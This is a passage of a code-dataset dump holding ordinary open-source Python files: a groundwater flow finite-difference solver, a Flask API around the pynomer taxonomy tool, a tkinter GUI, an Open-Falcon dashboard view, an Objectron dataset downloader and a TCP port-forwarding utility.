时间轴轴长,原则上单位为天\n self.tl = float(tl)\n\n def initial_condition(self, ic: str): # 初始条件的水头设定\n self.ic = str(ic)\n\n def width(self, B): # 含水层宽度的设定\n self.B = float(B)\n\n def draw(self, H_ALL: np.ndarray, time=0, title=''): # 按给定的时刻绘制水头曲线\n # X轴单元格的数目\n m = int(self.xl / self.sl) + 1\n # X轴\n X = np.linspace(0, self.xl, m)\n # 可以plt绘图过程中中文无法显示的问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n # 解决负号为方块的问题\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_subplot()\n ax.plot(X, H_ALL[time], linewidth=1, antialiased=True)\n\n def maxH_y(h_all):\n hy = 0\n for i in h_all:\n if i > hy:\n hy = i\n return hy\n\n def minH_y(h_all):\n hy = 0\n for i in h_all:\n if i < hy:\n hy = i\n return hy\n\n ax.set_ylim(minH_y(H_ALL[time]), maxH_y(H_ALL[time]))\n ax.set(ylabel='水头(m)', xlabel='X轴(m)')\n plt.suptitle(self.name_chinese)\n if title == '':\n plt.title(\"差分数值解,当前为第{0}时刻(差分空间步长{1},时间步长{2})\".format(time, self.sl, self.st))\n else:\n plt.title(title)\n plt.show()\n\n def draw_location(self, H_ALL: np.ndarray, location=0, title=''): # 按给定的时刻绘制水头曲线\n # T轴单元格的数目\n m = int(self.tl / self.st) + 1\n # T轴\n T = np.linspace(0, self.tl, m)\n # 水头轴\n H = []\n for i in H_ALL:\n H.append(i[location])\n # 可以plt绘图过程中中文无法显示的问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n # 解决负号为方块的问题\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_subplot()\n ax.plot(T, H, linewidth=1, antialiased=True)\n ax.set_ylim(min(H) - 1, max(H) + 1)\n ax.set(ylabel='水头(m)', xlabel='时间轴(d)')\n plt.suptitle(self.name_chinese)\n if title == '':\n plt.title(\"差分数值解,当前为第{0}位置(差分空间步长{1},时间步长{2})\".format(location, self.sl, self.st))\n else:\n plt.title(title)\n plt.show()\n\n def draw_surface(self, H_ALL: np.ndarray, title=''): # 绘制表面图\n # X轴单元格的数目\n m = int(self.xl / self.sl) + 1\n # 时间轴单元格数目\n n = int(self.tl / self.st) + 1\n # X轴\n X = np.linspace(0, self.xl, m)\n # 时间轴\n T = np.linspace(0, self.tl, n)\n # 定义初值\n X, T = np.meshgrid(X, T)\n # 可以plt绘图过程中中文无法显示的问题\n plt.rcParams['font.sans-serif'] = ['SimHei']\n # 解决负号为方块的问题\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure(figsize=(10, 7))\n ax = fig.add_subplot(projection='3d')\n\n def maxH_z(h_all):\n hz = 0\n for i in h_all:\n for j in i:\n if j > hz:\n hz = j\n return hz\n\n def minH_z(h_all):\n hz = 0\n for i in h_all:\n for j in i:\n if j < hz:\n hz = j\n return hz\n\n ax.set_zlim(minH_z(H_ALL), maxH_z(H_ALL))\n ax.plot_surface(X, T, H_ALL, linewidth=0, antialiased=True, cmap=plt.get_cmap('rainbow'))\n ax.set(zlabel='水头(m)', ylabel='时间轴(d)', xlabel='X轴(m)')\n plt.suptitle(self.name_chinese)\n if title == '':\n plt.title(\"差分数值解(差分空间步长{0},时间步长{1})\".format(self.sl, self.st))\n else:\n plt.title(title)\n plt.show()\n\n\nclass Random_one_dimension_boussinesq(Random_flow):\n def __init__(self):\n super().__init__()\n self.we = None\n self.Sy = None\n self.K = None\n self.w = None\n self.a = None\n self.a_as = None\n self.ha = None\n self.name_chinese = '潜水含水层随机非稳定一维流'\n\n def reference_thickness(self, ha): # 潜水含水层的参考厚度,解析解求解中使用参考厚度法线性化偏微分方程\n self.ha = float(ha)\n\n def pressure_diffusion_coefficient(self, a): # 潜水含水层压力扩散系数的设定。等于渗透系数乘初始水头常数除给水度Kh0/Sy\n self.a = float(a)\n\n def source_sink_expectation(self, we): # 源汇项期望值的设定\n self.we = float(we)\n\n def source_sink_term(self, w: str): # 潜水含水层源汇项的设定,可以为一个常数也可以为函数,如sin(x) + cos(t)\n self.w = w\n\n def fft_source_sink_term(self): # 对源汇项做快速傅里叶变换\n # 时间轴单元格数目\n n = int(self.tl / self.st) + 1\n # 时间轴\n t = np.linspace(0, self.tl, n)\n fft_w = fft(eval(self.w))\n return fft_w\n\n @staticmethod\n def fft_location(H_ALL: np.ndarray, location=0): # 对一个位置的不同时刻水头做快速傅里叶变换\n # 同一位置不同时刻的离散水头\n H = []\n for i in H_ALL:\n H.append(i[location])\n fft_H = fft(H)\n return fft_H\n\n def hydraulic_conductivity(self, K): # 潜水含水层渗透系数的设定\n self.K = float(K)\n\n def specific_yield(self, Sy): # 潜水含水层储水系数(重力给水度)的设定\n self.Sy = float(Sy)\n\n def random_w(self):\n # 随机振幅生成\n amplitude = random.uniform(0, self.we)\n # 随机周期生成\n while True:\n cycle = self.tl / int(random.uniform(1, 50)) # 依据香农采样定理采样频率必须大于信号频率的两倍\n if cycle >= 3 * self.st: # 所以信号周期的随机生成必须大于采样周期的两倍,本程序取三倍\n break\n # 随机频率\n frequency = 1 / cycle\n return amplitude, cycle, frequency\n\n def solve(self):\n # 如果未设定压力扩散系数\n if self.a is None or self.a == \"\":\n self.a = self.K / self.Sy\n # 对于潜水含水层一维非稳定流,定义两个参数 x t\n x = symbols(\"x\")\n t = symbols(\"t\")\n # X轴差分点的数目\n m = int(self.xl / self.sl) + 1\n # 时间轴差分点的数目\n n = int(self.tl / self.st) + 1\n\n # 对函数W(x, t)定义为源汇项函数除以渗透系数K\n def W(x, t):\n return eval(self.w) / self.K\n\n # 函数IC定义为初始水头分布曲线\n def IC(x):\n return eval(self.ic)\n\n # 创建一个全部值为0的矩阵,用于存放各个差分位置的水头值\n H_ALL = np.zeros((n, m))\n # 常数b矩阵\n H_b = np.zeros((m * n, 1))\n # 系数a矩阵\n H_a = np.zeros((m * n, m * n))\n # 定义系数a矩阵的行数\n\n # 矩阵赋值\n for k in range(0, n): # 对行(时间轴)进行扫描\n iteration_times = 0 # 迭代运算次数计数\n H_previous_iteration = np.zeros((1, m))\n # 迭代运算开始\n while True:\n H_a = np.zeros((m, m))\n l_a = 0\n H_b = np.zeros((m, 1))\n\n if iteration_times == 0 and k != 0:\n H_previous_iteration = H_ALL[k - 1] # 前次迭代的当前时刻水头数值,此处未开始计算,使用上一时刻的水头值进行近似\n\n for i in range(0, m): # 对列(X轴)进行扫描\n # 时间边界赋值(初始条件)\n if k == 0:\n H_a[l_a, l_a] = 1\n H_b[l_a] = IC(i * self.sl)\n\n # 左边界赋值\n elif (i - 1) < 0 and self.h_l[0] == 1: # 一类边界判断\n H_a[l_a, l_a] = 1\n H_b[l_a] = self.h_l[1]\n elif (i - 1) < 0 and self.h_l[0] == 2: # 二类边界判断\n # 源汇项赋值\n H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n k - 1, i] - 2 * self.sl * self.h_l[1] * (\n H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n # 给位置为(i, k)处的水头赋上系数值\n H_a[l_a, l_a] = -(H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl) - (H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n self.sl * self.sl) - self.Sy / (self.K * self.st)\n # 给位置为(i+1, k)处的水头赋上系数值\n H_a[l_a, l_a + 1] = (H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl) + (H_previous_iteration[i] + self.h_l[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n\n # 右边界赋值\n elif (i + 1) == m and self.h_r[0] == 1:\n H_a[l_a, l_a] = 1\n H_b[l_a] = self.h_r[1]\n elif (i + 1) == m and self.h_r[0] == 2:\n # 源汇项赋值\n H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n k - 1, i] + 2 * self.sl * self.h_r[1] * (\n H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n # 给位置为(i, k)处的水头赋上系数值\n H_a[l_a, l_a] = - (H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n self.sl * self.sl) - (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl) - self.Sy / (self.K * self.st)\n # 给位置为(i-1, k)处的水头赋上系数值\n H_a[l_a, l_a - 1] = (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl) + (H_previous_iteration[i] + self.h_r[1] * 0.5 * self.sl) / (\n self.sl * self.sl)\n else: # 非边界部分赋值\n # 源汇项赋值\n H_b[l_a] = - W(i * self.sl, k * self.st) - self.Sy / (self.K * self.st) * H_ALL[\n k - 1, i]\n # 给位置为(i, k)处的水头赋上系数值\n H_a[l_a, l_a] = -(H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl) - (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl) - self.Sy / (self.K * self.st)\n # 给位置为(i-1,k)处的水头赋上系数值\n H_a[l_a, l_a - 1] = (H_previous_iteration[i] + H_previous_iteration[i - 1]) / (\n 2 * self.sl * self.sl)\n # 给位置为(i+1, k)处的水头赋上系数值\n H_a[l_a, l_a + 1] = (H_previous_iteration[i + 1] + H_previous_iteration[i]) / (\n 2 * self.sl * self.sl)\n l_a += 1\n\n H = nla.solve(H_a, H_b) # 进行当前时刻的水头计算结果\n if k == 0: # 第零时刻不参与迭代计算\n break\n\n # 判断是否满足精度需求\n precision = 0\n for u in range(0, m):\n if abs(H_previous_iteration[u] - H[u]) > 0.01:\n precision = 1\n if precision != 1:\n break\n else:\n iteration_times += 1\n H_previous_iteration = H\n\n if iteration_times > 100:\n break\n for o in range(0, m): # 对空间进行扫描,整合成所有适合的计算水头\n H_ALL[k, o] = H[o]\n return H_ALL\n\n\nif __name__ == \"__main__\":\n flow = Random_one_dimension_boussinesq()\n flow.sl = 10\n flow.st = 5\n flow.ic = '60 + x * np.tan(3.1415/120) + 5 * np.sin(x/60)'\n flow.tl = 365\n flow.xl = 2000\n flow.h_r = [2, 0]\n flow.h_l = [1, 60]\n flow.Sy = 0.08\n flow.K = 10\n flow.we = 0.4\n # flow.w = '0'\n flow.w = '0.4/36 + 0.1/36 * sin(3.1415*t/200) + 0.05/36 * sin(3.1415*t/10)'\n d = flow.fft_source_sink_term()\n h = flow.solve()\n # flow.draw(H_ALL=h, time=0)\n a, b, c = flow.random_w()\n # print(a)\n # print(b)\n # print(c)\n\n print(len(d))\n\n flow.draw_surface(H_ALL=h)\n","repo_name":"YuLei-1005203115/FDM_groundwater","sub_path":"FDMgroundwater/randomflow.py","file_name":"randomflow.py","file_ext":"py","file_size_in_byte":14769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"40409864086","text":"from flask import Flask, jsonify, make_response, url_for, request\nimport pynomer\nfrom datetime import datetime\nimport logging\nimport sys\nimport os\n\napp = Flask(__name__)\n\nhandler = logging.StreamHandler(sys.stdout)\nhandler.setFormatter(\n logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n)\napp.logger.addHandler(handler)\napp.logger.setLevel(logging.DEBUG)\n\n\n# @app.before_first_request\n# def load_cache():\n# app.logger.info(\"Clean taxon cache\")\n# run_nomer(nomer_cmd=get_nomer_simple_cmd(cmd=\"clean\"))\n# app.logger.info(\"Load taxon cache\")\n# run_nomer(get_nomer_match_cmd(cmd=\"append\", id=\"GBIF:1\"))\n# app.logger.info(\"Ready to start server\")\n\n\n@app.route(\"/\")\ndef index():\n return \"\"\"\n

Nomer in Docker!

\n

A web-app for running Nomer inside Docker.

\n \"\"\"\n\n\n@app.route(\"/version\", methods=[\"GET\"])\ndef version():\n \"\"\"\n Show Version.\n \"\"\"\n cmd, result = pynomer.version()\n return get_response(cmd, result)\n\n\n@app.route(\"/clean\", methods=[\"GET\"])\ndef clean():\n \"\"\"\n Cleans term matcher cache.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.clean(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/matchers\", methods=[\"GET\"])\ndef matchers():\n \"\"\"\n Lists supported matcher and (optionally) their descriptions.\n :param o: [\"tsv\", \"json\"] Output format. Default: \"tsv\"\n :param v: [bool] If set, matcher descriptions are included for tsv. Default: False\n \"\"\"\n o = request.args.get(\"o\", \"tsv\")\n v = request.args.get(\"v\", \"\")\n\n cmd, result = pynomer.matchers(output_format=o, verbose=v)\n return get_response(cmd, result)\n\n\n@app.route(\"/replace\", methods=[\"GET\"])\ndef replace():\n \"\"\"\n Replace exact term matches in row. The input schema is used\n to select the id and/or name to match to. The output schema is\n used to select the columns to write into.\n :param query: [string] Query. Default: \n :param matcher: [string] Selected matcher. Default: \"globi-taxon-cache\"\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n\n query = request.args.get(\"query\", \"\")\n matcher = request.args.get(\"matcher\", \"globi-taxon-cache\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n e = False\n\n cmd, result = pynomer.replace(\n query=query, matcher=matcher, properties=p, echo_opt=\"-e\" if e else \"\"\n )\n return get_response(cmd, result)\n\n\n@app.route(\"/append\", methods=[\"GET\"])\ndef append():\n \"\"\"\n Append term match to row using id and name columns specified\n in input schema. Multiple matches result in multiple rows.\n :param query: [string] Query. Default: \n :param matcher: [string] Selected matcher. Default: \"globi-taxon-cache\"\n :param p: [string] Path to properties file to override defaults. Default: None\n :param o: [\"tsv\", \"json\"] Output format. Default: \"tsv\"\n \"\"\"\n query = request.args.get(\"query\", \"\")\n matcher = request.args.get(\"matcher\", \"globi-taxon-cache\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n o = request.args.get(\"o\", \"tsv\")\n e = False\n\n cmd, result = pynomer.append(\n query=query,\n matcher=matcher,\n properties=p,\n output_format=o,\n echo_opt=\"-e\" if e else \"\",\n )\n return get_response(cmd, result)\n\n\n@app.route(\"/input_schema\", methods=[\"GET\"])\ndef input_schema():\n \"\"\"\n Show input schema in JSON.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.input_schema(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/output_schema\", methods=[\"GET\"])\ndef output_schema():\n \"\"\"\n Show output schema.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.output_schema(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/properties\", methods=[\"GET\"])\ndef properties():\n \"\"\"\n Lists configuration properties. Can be used to make a local copy and override\n default settings.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.properties(properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/validate_term\", methods=[\"GET\"])\ndef validate_term():\n \"\"\"\n Validate terms.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n filepath = request.args.get(\"filepath\", \"\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.validate_term(filepath, properties=p)\n return get_response(cmd, result)\n\n\n@app.route(\"/validate_term_link\", methods=[\"GET\"])\ndef validate_term_link():\n \"\"\"\n Validate term links.\n :param p: [string] Path to properties file to override defaults. Default: None\n \"\"\"\n filepath = request.args.get(\"filepath\", \"\")\n p = request.args.get(\"p\", \"None\")\n p = get_properties(p)\n\n cmd, result = pynomer.validate_term_link(filepath, properties=p)\n return get_response(cmd, result)\n\n\ndef get_response(cmd, cmd_result):\n headers = {}\n return make_response(\n jsonify(\n {\n \"command\": cmd,\n \"result\": cmd_result,\n \"tstamp\": datetime.utcnow().timestamp(),\n \"endpoints\": {\"url_index\": url_for(\"index\", _external=True)},\n }\n ),\n 200,\n headers,\n )\n\n\ndef get_properties(p):\n p = p if p != \"None\" else None\n if p:\n path = os.path.join(os.getcwd(), \"input_properties\")\n with open(path, \"w\") as f:\n app.logger.debug(f\"Create new file {path} with content {p}\")\n f.write(p)\n return path\n return p\n\n\nif __name__ == \"__main__\":\n pynomer.append(query=\"\\tHomo sapiens\", matcher=\"globi-taxon-cache\")\n app.run(debug=True, host=\"0.0.0.0\", port=\"9090\", threaded=True)\n","repo_name":"nleguillarme/pynomer","sub_path":"pynomer/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"15966780973","text":"import tkinter as tk\nfrom tkinter import ttk\n\nfrom GUI_lent import Window as Lent\nfrom GUI_media import Window as Media\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.title(\"Barbara\")\n self.geometry('800x650')\n self.resizable(False, False)\n\n self.tabControl = ttk.Notebook(self)\n self.tab1 = ttk.Frame(self.tabControl)\n self.tab2 = ttk.Frame(self.tabControl)\n\n self.tabControl.add(self.tab1, text='lent')\n self.tabControl.add(self.tab2, text='media')\n self.tabControl.pack(expand=1, fill=\"both\")\n\n self.lent = Lent(self.tab1)\n self.media = Media(self.tab2)\n\n self.lent.pack(fill='x', anchor='s')\n self.media.pack()\n\n\nif __name__=='__main__':\n barbara = App()\n barbara.mainloop()\n","repo_name":"AkitoKay/Barbara","sub_path":"Code/GUI_main.py","file_name":"GUI_main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"38"} +{"seq_id":"32542636287","text":"__author__ = 'niean'\nfrom rrd import app\nfrom flask import request, g, render_template, jsonify\nfrom rrd.model.portal.poly import PolyMetric\nfrom rrd.utils.params import required_chk\nfrom rrd.utils.logger import logging\nfrom rrd.utils.format import replace_str_for_counter\nfrom rrd.config import *\nlog = logging.getLogger(__file__)\n\n\ndef gen_single_poly_grafana_link(grp_p, metric_p):\n '''\n\n https://grafana.xxxx.com/d/single_metric_falcon_poly_metric/single_metric_falcon_poly_metric?orgId=1\n &refresh=1m&var-metric_line=cpu_busy&var-metric=cpu.busy\n &var-poly_res_sum=poly_res_cpu_busy_sum&var-poly_res_avg=poly_res_cpu_busy_avg\n # &&var-falcon_poly_name=falcon_group_poly_data_system_openfalcon\n # &var-grp_name=data_system_openfalcon&\n # var-prome=falcon_group_data_system_openfalcon&\n # &var-group_name_point=data.system.openfalcon\n :return:\n '''\n prome_metric = replace_str_for_counter(metric_p.split('/',1)[0])\n\n grp_l = replace_str_for_counter(grp_p)\n metric_l = replace_str_for_counter(metric_p)\n url = '{}&var-grp_name={}&var-group_name_point={}&var-falcon_poly_name=falcon_group_poly_{}&var-prome=falcon_group_{}&var-poly_res_sum=poly_res_{}_sum&var-poly_res_avg=poly_res_{}_avg&var-metric_line={}&var-metric={}&var-prome_metric={}'.format(\n\n GRAFANA_SINGLE_POLY_URL,grp_l, grp_p, grp_l, grp_l, prome_metric, prome_metric, metric_l, metric_p,prome_metric)\n # print(url)\n return url\n\n\n@app.route('/portal/poly')\ndef polys_get():\n page = int(request.args.get('p', 1))\n limit = int(request.args.get('limit', 20))\n query = request.args.get('q', '').strip()\n mine = request.args.get('mine', '1')\n me = g.user.name if mine == '1' else None\n vs, total = PolyMetric.query(page, limit, query, me)\n\n new_vs = []\n for v in vs:\n setattr(v,'g_url',gen_single_poly_grafana_link(v.name,v.counter))\n new_vs.append(v)\n return render_template(\n 'portal/poly/list.html',\n data={\n # 'vs': vs,\n 'vs': new_vs,\n 'total': total,\n 'query': query,\n 'limit': limit,\n 'page': page,\n 'mine': mine,\n }\n )\n\n\n@app.route('/portal/poly/add')\ndef poly_update_get():\n o = PolyMetric.get(int(request.args.get('poly_id', '0').strip()))\n return render_template('portal/poly/add.html', data={'poly': o})\n\n\n@app.route('/portal/poly/update', methods=['POST'])\ndef poly_update_post():\n poly_id = request.form['poly_id'].strip()\n name = request.form['name'].strip()\n poly_type = request.form['poly_type'].strip()\n counter = request.form['counter'].strip()\n msg = required_chk({\n 'name': name,\n 'poly_type': poly_type,\n 'counter': counter,\n })\n\n if msg:\n return jsonify(msg=msg)\n name = name.split(\"\\n\")\n counter = counter.split(\"\\n\")\n if len(name) == 0 or len(counter) == 0:\n return jsonify(msg=\"name empty or counter empty\")\n res = dict()\n for n in name:\n if not n:\n continue\n\n for c in counter:\n if not c:\n continue\n rr = PolyMetric.save_or_update(\n poly_id,\n n,\n poly_type,\n c,\n g.user.name,\n )\n if rr:\n res[\"name_{}_counter_{}\".format(n, c)] = rr\n if not res:\n return jsonify(msg='')\n return jsonify(msg=str(res))\n # return jsonify(msg=PolyMetric.save_or_update(\n # poly_id,\n # name,\n # poly_type,\n # counter,\n # g.user.name,\n # ))\n\n\n@app.route('/portal/poly/delete/')\ndef poly_delete_get(poly_id):\n poly_id = int(poly_id)\n PolyMetric.delete_one(poly_id)\n return jsonify(msg='')\n","repo_name":"ning1875/falcon-dashboard","sub_path":"rrd/view/portal/poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"12991148761","text":"from __future__ import annotations\n\nimport logging\nimport os\nfrom pathlib import Path\nfrom typing import Final\n\nimport cv2\nimport requests\n\nDATASET_BASE_URL = \"https://storage.googleapis.com/objectron\"\nLOCAL_DATASET_DIR: Final = Path(os.path.dirname(__file__)) / \"dataset\"\nIMAGE_RESOLUTION: Final = (1440, 1920)\nGEOMETRY_FILENAME: Final = \"geometry.pbdata\"\nANNOTATIONS_FILENAME: Final = \"annotation.pbdata\"\nVIDEO_FILENAME: Final = \"video.MOV\"\n\nAVAILABLE_RECORDINGS = [\n \"bike\",\n \"book\",\n \"bottle\",\n \"camera\",\n \"cereal_box\",\n \"chair\",\n \"cup\",\n \"laptop\",\n \"shoe\",\n]\n\n\ndef ensure_downloaded(src_url: str, dst_path: Path) -> None:\n os.makedirs(dst_path.parent, exist_ok=True)\n if not dst_path.exists():\n logging.info(\"Downloading %s to %s\", src_url, dst_path)\n with requests.get(src_url, stream=True) as req:\n req.raise_for_status()\n with open(dst_path, \"wb\") as f:\n for chunk in req.iter_content(chunk_size=8192):\n f.write(chunk)\n\n\ndef find_path_if_downloaded(recording_name: str, local_dataset_dir: Path) -> Path | None:\n local_recording_dir = local_dataset_dir / recording_name\n paths = list(local_recording_dir.glob(f\"**/{ANNOTATIONS_FILENAME}\"))\n if paths:\n return paths[0].parent\n return None\n\n\ndef get_recording_id_from_name(recording_name: str) -> str:\n recording_ids_raw = requests.get(f\"{DATASET_BASE_URL}/v1/index/{recording_name}_annotations_test\").text\n recording_id = recording_ids_raw.split(\"\\n\")[0]\n return recording_id\n\n\ndef ensure_opencv_version_ok() -> None:\n if cv2.getVersionMajor() == 4 and cv2.getVersionMinor() == 6:\n raise RuntimeError(\n \"\"\"Opencv 4.6 contains a bug which will unpack some videos with the incorrect orientation.\n See: https://github.com/opencv/opencv/issues/22088\n Please upgrade or downgrade as appropriate.\"\"\"\n )\n\n\ndef ensure_recording_downloaded(recording_name: str, dataset_dir: Path) -> Path:\n \"\"\"\n Makes sure the recording is downloaded.\n\n Returns the path to where the dataset is downloaded locally.\n \"\"\"\n ensure_opencv_version_ok()\n\n local_recording_dir = find_path_if_downloaded(recording_name, dataset_dir)\n if local_recording_dir is not None:\n return local_recording_dir\n\n recording_id = get_recording_id_from_name(recording_name)\n local_recording_dir = dataset_dir / recording_id\n recording_url = f\"{DATASET_BASE_URL}/videos/{recording_id}\"\n\n ensure_downloaded(f\"{recording_url}/{VIDEO_FILENAME}\", local_recording_dir / VIDEO_FILENAME)\n ensure_downloaded(f\"{recording_url}/{GEOMETRY_FILENAME}\", local_recording_dir / GEOMETRY_FILENAME)\n ensure_downloaded(\n f\"{DATASET_BASE_URL}/annotations/{recording_id}.pbdata\", local_recording_dir / ANNOTATIONS_FILENAME\n )\n\n return local_recording_dir\n\n\ndef ensure_video_is_split_into_frames(recording_dir: Path, force_reprocess: bool = False) -> None:\n video_path = recording_dir / VIDEO_FILENAME\n frames_dir = recording_dir / \"video\"\n if force_reprocess or not frames_dir.exists():\n logging.info(\"Splitting video at %s into frames in %s\", video_path, frames_dir)\n os.makedirs(frames_dir, exist_ok=True)\n\n vidcap = cv2.VideoCapture(str(video_path))\n success, image = vidcap.read()\n count = 0\n while success:\n cv2.imwrite(f\"{frames_dir}/{count}.jpg\", image)\n success, image = vidcap.read()\n count += 1\n\n\ndef ensure_recording_available(name: str, local_dataset_dir: Path, force_reprocess_video: bool = False) -> Path:\n recording_path = ensure_recording_downloaded(name, local_dataset_dir)\n ensure_video_is_split_into_frames(recording_path, force_reprocess_video)\n return recording_path\n","repo_name":"rerun-io/rerun","sub_path":"examples/python/objectron/download_dataset.py","file_name":"download_dataset.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":3502,"dataset":"github-code","pt":"38"} +{"seq_id":"5534011403","text":"# -*- coding: utf-8 -*-\n# tcp mapping created by wxk at 2021-12-7\n\nimport sys\nimport socket\nimport logging\nimport threading\n\n\n# 端口映射配置信息\nCFG_REMOTE_IP = '127.0.0.1'\nCFG_REMOTE_PORT = 22\nCFG_LOCAL_IP = '0.0.0.0'\nCFG_LOCAL_PORT = 10086\n\n# 接收数据缓存大小\nPKT_BUFF_SIZE = 2048\n\nlogger = logging.getLogger(\"Proxy Logging\")\nformatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',)\n\nstream_handler = logging.StreamHandler(sys.stderr)\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\n\nlogger.setLevel(logging.DEBUG)\n\n# 单向流数据传递\ndef tcp_mapping_worker(conn_receiver, conn_sender):\n while True:\n try:\n data = conn_receiver.recv(PKT_BUFF_SIZE)\n except Exception:\n logger.debug('Connection closed.')\n break\n\n if not data:\n logger.info('No more data is received.')\n break\n\n try:\n conn_sender.sendall(data)\n except Exception:\n logger.error('Failed sending data.')\n break\n\n # logger.info('Mapping data > %s ' % repr(data))\n logger.info('Mapping > %s -> %s > %d bytes.' % (conn_receiver.getpeername(), conn_sender.getpeername(), len(data)))\n\n conn_receiver.close()\n conn_sender.close()\n\n return\n\n# 端口映射请求处理\ndef tcp_mapping_request(local_conn, remote_ip, remote_port):\n remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n try:\n remote_conn.connect((remote_ip, remote_port))\n except Exception:\n local_conn.close()\n logger.error('Unable to connect to the remote server.')\n return\n\n # 这种方式是不行的,为什么会被阻塞呢?\n # tcp_mapping_worker(local_conn, remote_conn)\n # tcp_mapping_worker(remote_conn, local_conn)\n\n threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start()\n threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start()\n\n return\n\n# 端口映射函数\ndef tcp_mapping(remote_ip, remote_port, local_ip, local_port):\n local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n local_server.bind((local_ip, local_port))\n local_server.listen(5)\n\n logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')\n\n while True:\n try:\n (local_conn, local_addr) = local_server.accept()\n except Exception:\n local_server.close()\n logger.debug('Stop mapping service.')\n break\n\n threading.Thread(target=tcp_mapping_request, args=(local_conn, remote_ip, remote_port)).start()\n\n logger.debug('Receive mapping request from %s:%d.' % local_addr)\n\n return\n\n# 主函数\nif __name__ == '__main__':\n tcp_mapping(CFG_REMOTE_IP, CFG_REMOTE_PORT, CFG_LOCAL_IP, CFG_LOCAL_PORT)","repo_name":"xk-wang/myfrp","sub_path":"pytest/frpctest.py","file_name":"frpctest.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"38"} +{"seq_id":"5533801583","text":"# flake8: noqa\nimport os.path as osp\nimport pathlib\n\nfrom yanerf.utils.config import Config\nfrom yanerf.utils.registry import Registry\n\nTRAINER = Registry(\"Trainer\")\n\n\n@TRAINER.register_module()\nclass MyTrainer:\n def __init__(self, lr: int, epochs: int) -> None:\n self.lr = lr\n self.epochs = epochs\n\n\ndef test_builder():\n cfg = Config.fromfile(osp.join(osp.dirname(__file__), \"configs/test_utils_config.yml\"))\n trainer = TRAINER.build(cfg.trainer)\n print(f\"\\nMY CFG: {cfg.pretty_text}\")\n print(trainer.__dict__)\n","repo_name":"xk-huang/yet-another-nerf","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"9191816978","text":"from snakemake.utils import read_job_properties\nimport sys\nimport subprocess as sp\nimport json\ncluster_json_file =sys.argv[1]\njobscript = sys.argv[2]\ncustom_config_rules = ['job_to_bundle']\nwith open(cluster_json_file) as j:\n cluster_json = json.load(j)\n#%%\n\nparams = cluster_json['__default__']\njob_properties = read_job_properties(jobscript)\nrule = job_properties['rule']\nif rule in cluster_json:\n for key in cluster_json[rule]:\n params[key] = cluster_json[rule][key]\nelif rule in custom_config_rules:\n # specifify custom configureations specific rules\n print(rule)\n if 